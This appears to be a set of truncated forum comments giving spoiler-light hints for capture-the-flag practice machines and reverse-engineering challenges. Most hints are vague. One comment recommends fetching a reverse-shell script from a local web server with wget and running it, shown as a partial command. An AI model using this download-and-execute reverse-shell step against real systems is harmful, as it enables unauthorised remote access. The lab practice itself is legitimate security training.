Took me a day to solve it without any tooling (besides IDA and its embedded debugger). At first it may seem a bit complex but as you start pulling the string it becomes more and more evident what you need to actually bypass.
Check the file entry po…
Oh my lord, my first hard box!
Dude, never messed with almost any of these things, but bit by bit I was able to progress (not fast, but progress at least). Took me a WHOLE week, but I assume that when familiar with the technologies it is not something …
Foothold: Simple enumeration leads you there. It's ugly to do, but you might need to steal something! If you don't know what to steal, check around what you can do and see.
User: Not difficult, the standard enumeration should lead you where you ne…
Quite a ride, got it in the end.
If somebody is asking why it does work locally, try it on a 32-bit system. On mine (64-bit) it was not working, and a new VM did the trick for testing.
If you need help reach out to me
Nice box, very good to mess with stuff that I never did before!
Foothold: Well, a must-check pentesting procedure should lead you there. If you never messed with it (like me), search for that type key :)
User: Did you check everything before getti…
Well, I took a bit more time since I had never read C++ code (nor its assembly form), but the solution is way easier (and less time-consuming) to get than by brute-forcing it!
That one simple instruction in the middle of it needed a bit of attention!
Hey guys, thanks a lot!
I did the Academy Windows Fundamentals and it was pretty straightforward!
Guess I'll upgrade to VIP just to start messing with easy boxes, together with some reading on those subjects you suggested.
Rooted, quite an easy box actually!
Foothold: check the request and play with it
User: old vulnerability, search for it
Root: Never played with Go, but I think it's doable with a bit of research. When exploiting binaries what is the most useful thi…
Simple enumeration will guide you to the right place
Enum the right place
And you already have it
Easiest part. The traditional scripts will bloat your screen; you should notice that! (examine the folder. y…
What I suggest for those with payload problems is: download a shell script from your local Python http.server to perform the reverse shell; special symbols may cause problems.
This approach got me good: wget "yourserver/rev.sh" && …
Why am I so distracted and overlook things???
Contrary to everyone, the user was easier than the root!
Might be luck but, things just went the right path (even not using docker prior to this)...
* look carefully (enumeration)